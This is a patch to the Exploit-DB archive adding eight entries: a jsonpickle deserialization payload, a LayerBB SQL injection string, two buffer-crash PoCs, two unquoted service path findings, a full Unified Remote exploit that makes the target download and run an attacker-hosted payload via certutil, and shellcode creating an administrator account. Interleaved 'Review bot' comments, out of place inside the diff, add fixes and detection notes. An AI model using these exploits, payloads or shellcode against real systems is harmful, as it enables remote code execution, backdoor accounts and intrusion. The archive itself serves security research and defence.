From 338282491bebf31e527e0c61b96b0761b0187ab5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 25 Feb 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-02-25 8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) --- exploits/multiple/remote/49585.py | 27 ++++++ exploits/php/webapps/49593.txt | 10 +++ exploits/windows/dos/49589.py | 30 +++++++ exploits/windows/dos/49590.py | 30 +++++++ exploits/windows/local/49586.txt | 28 ++++++ exploits/windows/local/49588.txt | 28 ++++++ exploits/windows/remote/49587.py | 137 ++++++++++++++++++++++++++++++ files_exploits.csv | 7 ++ files_shellcodes.csv | 1 + shellcodes/windows_x86/49592.asm | 84 ++++++++++++++++++ 10 files changed, 382 insertions(+) create mode 100755 exploits/multiple/remote/49585.py create mode 100644 exploits/php/webapps/49593.txt create mode 100755 exploits/windows/dos/49589.py create mode 100755 exploits/windows/dos/49590.py create mode 100644 exploits/windows/local/49586.txt create mode 100644 exploits/windows/local/49588.txt create mode 100755 exploits/windows/remote/49587.py create mode 100644 shellcodes/windows_x86/49592.asm diff --git a/exploits/multiple/remote/49585.py b/exploits/multiple/remote/49585.py new file mode 100755 index 000000000..7e2c98b6a --- /dev/null +++ b/exploits/multiple/remote/49585.py 
@@ -0,0 +1,27 @@
+# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
+# Date: 24-2-2021
+# Vendor Homepage: https://jsonpickle.github.io
+# Exploit Author: Adi Malyanker, Shay Reuven
+# Software Link: https://github.com/jsonpickle/jsonpickle
+# Version: 2.0.0
+# Tested on: windows, linux
+
+# Python is an open source language. jsonickle module is provided to convert objects into a serialized form,
+# and later recover the data back into an object. the decode is used to undeserialize serialized strings.
+
+# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
+# the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".
+
+# The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet
+
+# the payload was found during our research made on deserialization functions.
+
+# the pattern should be :
+# {..{"py/repr":/}..}
+
+# example:
+
+malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
+
+# the command on the server side
+some_parameter = jsonpickle.decode(malicious)
\ No newline at end of file
diff --git a/exploits/php/webapps/49593.txt b/exploits/php/webapps/49593.txt
new file mode 100644
index 000000000..2d0870a50
--- /dev/null
+++ b/exploits/php/webapps/49593.txt
@@ -0,0 +1,10 @@
+# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
+# Date: 2021-02-19
+# Exploit Author: Görkem Haşin
+# Version: 1.1.4
+# Tested on: Linux/Windows
+
+# POST /search.php HTTP/1.1
+# Host: Target
+
+Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search
\ No newline at end of file
diff --git a/exploits/windows/dos/49589.py b/exploits/windows/dos/49589.py
new file mode 100755
index 000000000..477583e4a
--- /dev/null
+++ b/exploits/windows/dos/49589.py
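Review bot: `some_parameter = jsonpickle.decode(malicious)` on the last line references `jsonpickle` without an `import jsonpickle` anywhere in the file, so as committed the example is a fragment rather than a runnable PoC; either add the import or say in the comment above it that the two lines stand for server-side code. The pattern line `# {..{"py/repr":/}..}` has lost whatever stood between `py/repr` and `/` and no longer matches the example that follows, so it should be rewritten to match it. For the index reader the advisory is more useful with its mitigation stated: `py/repr` is honoured by design and jsonpickle's own documentation warns against decoding untrusted or unauthenticated input, so the fix is to never hand attacker-controlled strings to `jsonpickle.decode` rather than to wait for a patch.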
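Review bot: The header of 49593.txt carries no `# Vendor Homepage:` or `# Software Link:` line, unlike every other advisory in this commit, so the affected project cannot be located or the version verified from the entry; add `# Software Link: <LayerBB release URL>` (placeholder). The `Payload:` line also does not say whether the POST to `/search.php` needs an authenticated session, which a triager needs to know before reproducing. The remediation that belongs here is the standard one and is worth a line: bind `search_query` as a parameter of a prepared statement instead of concatenating it into the search query.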
@@ -0,0 +1,30 @@
+# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
+# Exploit Author : Sinem Şahin
+# Exploit Date: 2021-02-10
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested on: Windows 7 x64
+# Version: 5.3.5
+
+
+# Steps:
+ 1- Run the python script. (exploit.py)
+ 2- Open payload.txt and copy content to clipboard.
+ 3- Run 'SpotAuditor 5.3.5'.
+ 4- Register -> Enter Registration Code
+ 5- Paste clipboard into the "Name" or "Key".
+ 6- Click on OK.
+ 7- Crashed.
+
+---> exploit.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print"File okey!!"
+except:
+    print "File is not created."
\ No newline at end of file
diff --git a/exploits/windows/dos/49590.py b/exploits/windows/dos/49590.py
new file mode 100755
index 000000000..c4e9c98f8
--- /dev/null
+++ b/exploits/windows/dos/49590.py
@@ -0,0 +1,30 @@
+# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
+# Exploit Author : Sinem Şahin
+# Exploit Date: 2021-02-23
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Version: 4.2.7
+# Tested on: Windows 7 x64
+
+
+# Steps:
+1- Run the python script. (exploit.py)
+2- Open payload.txt and copy content to clipboard.
+3- Run 'Product Key Explorer 4.2.7'.
+4- Register -> Enter Registration Code
+5- Paste clipboard into the "Key" or "Name".
+6- Click on OK.
+7- Crashed.
+
+---> exploit.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print "File created!"
+except:
+    print "File cannot be created!!"
\ No newline at end of file
diff --git a/exploits/windows/local/49586.txt b/exploits/windows/local/49586.txt
new file mode 100644
index 000000000..703c9ae4e
--- /dev/null
+++ b/exploits/windows/local/49586.txt
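Review bot: Neither 49589.py nor 49590.py (this hunk and the next one) is valid Python despite the `.py` extension: the numbered `Steps:` lines and the `---> exploit.py <--` marker sit outside any comment, so `python 49589.py` stops with a SyntaxError before `buffer` is ever built. Prefixing those lines with `# ` keeps the reproduction notes and makes the file runnable, or the entries should be stored as `.txt` like 49586.txt. The `print"File okey!!"` and `print "File created!"` statements are Python 2 syntax, which the `#!/usr/bin/env python` shebang does not pin, so the header should name the interpreter version. The bare `except:` also hides the actual failure (permissions, working directory); `except IOError as e:` with `e` included in the message would tell a reproducer what went wrong.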
@@ -0,0 +1,28 @@
+# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
+# Discovery by: Victor Mondragón
+# Discovery Date: 23-02-2021
+# Vendor Homepage: https://www.softros.com/
+# Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi
+# Tested Version: 8.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 7 Service Pack 1 x64
+# Step to discover Unquoted Service Path:
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto
+
+
+C:\>sc qc LogonExpertSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: LogonExpertSvc
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
+ LOAD_ORDER_GROUP : LogonExpertGroup
+ TAG : 0
+ DISPLAY_NAME : LogonExpert Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49588.txt b/exploits/windows/local/49588.txt
new file mode 100644
index 000000000..cf5a8c511
--- /dev/null
+++ b/exploits/windows/local/49588.txt
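Review bot: Neither 49586.txt nor 49588.txt (this hunk and the next) records the precondition that turns an unquoted service path into a privilege escalation: a standard user must be able to write into one of the intermediate directories (here under `C:\Program Files\Softros Systems\`), and `Program Files` is not writable by standard users by default. The `sc qc` output establishes only the unquoted `BINARY_PATH_NAME` and `SERVICE_START_NAME : LocalSystem`; without the directory ACLs (an `icacls` listing of those paths) the entry documents a finding, not a working escalation, and the header should say which it is. The vendor-side fix worth a line is quoting the image path, e.g. `sc config LogonExpertSvc binPath= "\"C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe\""`.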
@@ -0,0 +1,28 @@
+# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
+# Discovery by: Victor Mondragón
+# Discovery Date: 23-02-2021
+# Vendor Homepage: https://www.softros.com/
+# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
+# Tested Version: 9.6.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro 64 bits
+
+# Step to discover Unquoted Service Path:
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto
+
+C:\>sc qc SoftrosSpellChecker
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SoftrosSpellChecker
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
+ GRUPO_ORDEN_CARGA : System Reserved
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Softros Spell Checker
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/remote/49587.py b/exploits/windows/remote/49587.py
new file mode 100755
index 000000000..f90874c95
--- /dev/null
+++ b/exploits/windows/remote/49587.py
@@ -0,0 +1,137 @@ +# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution +# Author: H4rk3nz0 +# Vendor Homepage: https://www.unifiedremote.com/ +# Software Link: https://www.unifiedremote.com/download +# Tested on: Windows 10, 10.0.19042 Build 19042 + +#!/usr/bin/python + +import socket +import sys +import os +from time import sleep + +target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +port = 9512 + +# Packet Data Declarations; Windows, Space and Enter have non-standard values + +open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862" +"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400" +"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831" +"000356657273696f6e000000000a00").decode("hex") + +open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7" +"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453" +"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646" +"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571" +"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000" +).decode("hex") + +one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024" +"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756" +"5730002000556616c756500").decode("hex") + +two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007" +"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex") + +three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730" +"386531346535323834636238310000").decode("hex") + +win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726" +"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065" 
+"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797" +"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055" +"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6" +"9642d643730386531346535323834636238310000").decode("hex") + +ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172" +"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000" +"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000" +"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730" +"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365" +"00616e64726f69642d643730386531346535323834636238310000").decode("hex") + +space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6" +"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617" +"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650" +"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756" +"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726" +"36500616e64726f69642d643730386531346535323834636238310000").decode("hex") + +# ASCII to Hex Conversion Set +characters={ + "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", + "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", + "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", + "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", + "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", + "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", + 
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", + "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", + "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} + +# User Specified arguments +try: + rhost = sys.argv[1] + lhost = sys.argv[2] + payload = sys.argv[3] +except: + print("Usage: python " + sys.argv[0] + " ") + + +# Send Windows Key Input Twice +def SendWin(): + target.sendto(win_key,(rhost, port)) + target.sendto(win_key,(rhost, port)) + sleep(0.4) + + +# Send Enter/Return Key Input +def SendReturn(): + target.sendto(ret_key,(rhost, port)) + sleep(0.4) + +# Send String Characters +def SendString(string, rhost): + for char in string: + if char == " ": + target.sendto(space_key,(rhost, port)) + sleep(0.02) + else: + convert = characters[char].decode("hex") + target.sendto(one + convert + two + convert + three,(rhost, port)) + sleep(0.02) + +# Main Execution +def main(): + target.connect((rhost,port)) + sleep(0.5) + print("[+] Connecting to target...") + target.sendto(open,(rhost,port)) # Initialize Connection to Unified + sleep(0.02) + target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection + print("[+] Popping Start Menu") + sleep(0.02) + SendWin() + sleep(0.3) + print("[+] Opening CMD") + SendString("cmd.exe", rhost) + sleep(0.3) + SendReturn() + sleep(0.3) + print("[+] *Super Fast Hacker Typing*") + SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload + sleep(0.3) + print("[+] Downloading Payload") + SendReturn() + sleep(3) + SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload + sleep(0.3) + SendReturn() + print("[+] Done! Check listener?") + target.close() + +if __name__=="__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d38b8bb4f..4564adff9 100644 --- a/files_exploits.csv 
+++ b/files_exploits.csv
@@ -6755,6 +6755,8 @@ id,file,description,date,author,type,platform,port
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+49589,exploits/windows/dos/49589.py,"SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
+49590,exploits/windows/dos/49590.py,"Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)",2021-02-24,"Sinem Şahin",dos,windows,
 48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 48728,exploits/windows/dos/48728.py,"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
 48729,exploits/windows/dos/48729.py,"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)",2020-08-04,"Luis Martínez",dos,windows,
@@ -11175,6 +11177,8 @@ id,file,description,date,author,type,platform,port
 48469,exploits/windows/local/48469.py,"Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)",2020-05-14,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 49577,exploits/windows/local/49577.py,"dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow (PoC)",2021-02-19,"Kağan Çapar",local,windows,
+49586,exploits/windows/local/49586.txt,"LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
+49588,exploits/windows/local/49588.txt,"Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path",2021-02-24,"Victor Mondragón",local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
@@ -18355,6 +18359,8 @@ id,file,description,date,author,type,platform,port
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
 49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows,
+49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple,
+49587,exploits/windows/remote/49587.py,"Unified Remote 3.9.0.2463 - Remote Code Execution",2021-02-24,H4rk3nz0,remote,windows,
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
@@ -43775,3 +43781,4 @@ id,file,description,date,author,type,platform,port
 49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
 49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
 49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
+49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index c8766c1ef..7bafdcd84 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1031,3 +1031,4 @@ id,file,description,date,author,type,platform
 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
 49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
+49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
diff --git a/shellcodes/windows_x86/49592.asm b/shellcodes/windows_x86/49592.asm
new file mode 100644
index 000000000..6e8966f71
--- /dev/null
+++ b/shellcodes/windows_x86/49592.asm
@@ -0,0 +1,84 @@
+# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
+# Exploit Author: Armando Huesca Prida
+# Date: 20-02-2021
+#
+# Tested on:
+# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
+# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
+# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
+#
+# Description:
+# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
+# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
+#
+# Shellcode considerations:
+# Function address of CreateProcessA in kernel32.dll: 0x77082082
+# Function address of ExitProcess in kernel32.dll: 0x770d214f
+# Administartor user credentials: alfred:test
+# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
+#
+
+
+# Assembly shellcode:
+
+global _start
+
+section .text
+
+_start:
+jmp application
+
+firststep:
+pop edi
+xor eax, eax
+mov esi, 0x111111A9
+sub esi, 0x11111111
+mov [edi+esi], al ; size of message db parameter
+
+StartUpInfoANDProcessInformation:
+push eax; hStderror null in this case
+push eax; hStdOutput, null
+push eax; hStdInput, null
+xor ebx, ebx
+xor ecx, ecx
+add cl, 0x12; 18 times loop to fill both structures.
+
+looper:
+push ebx
+loop looper
+
+;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
+mov bx, 0x1111
+sub bx, 0x1010
+mov word [esp+0x3c], bx
+mov byte [esp+0x10], 0x44; cb=3D0x44
+lea eax, [esp+0x10]; eax points to StartUpInfo
+
+; eax holds a pointer to StartUPinfo
+; esp holds a pointer to Process_Info filled of null values
+
+createprocessA:
+push esp; pointer to Process-Info
+push eax; pointer to StartUpInfo
+xor ebx, ebx
+push ebx; null
+push ebx; null
+push ebx; null
+inc ebx
+push ebx; bInheritHandles=3Dtrue
+dec ebx
+push ebx; null
+push ebx; null
+push edi; pointer to message db string
+push ebx; null
+mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
+call edx
+
+ExitProcess:
+push eax; createprocessA return in eax
+mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
+call edx
+
+application:
+call firststep
+message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'
\ No newline at end of file
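Review bot: The `Tested on:` header lists Windows 7, Vista and Server 2003, but `mov edx, 0x77082082` and `mov edx, 0x770d214f` hard-code CreateProcessA and ExitProcess addresses that can match only one kernel32.dll build at one base (Vista and later randomise that base per boot), so the header should state the exact build those constants were read from and that the shellcode faults on any other target; the `Description:` line mentions static addresses but does not say this. The `=3D` in `cb=3D0x44`, `bInheritHandles=3Dtrue` and the size comment looks like quoted-printable residue from the mailed patch rather than file content; if it is in the file it should read `=`. `add cl, 0x12` is a magic number: the three preceding `push eax` plus 18 `push ebx` zero 21 dwords = 0x54 bytes, exactly STARTUPINFO (0x44) + PROCESS_INFORMATION (0x10), and a comment `; 3 + 18 dwords = 0x54 = sizeof(STARTUPINFO) + sizeof(PROCESS_INFORMATION)` would make that checkable. For detection, the command line in `message db` is passed in clear text to `cmd.exe /c`, so it appears verbatim in process-creation telemetry (Security 4688 / Sysmon event 1) and produces 4720 (user created) and 4732 (member added to local group) events on the host.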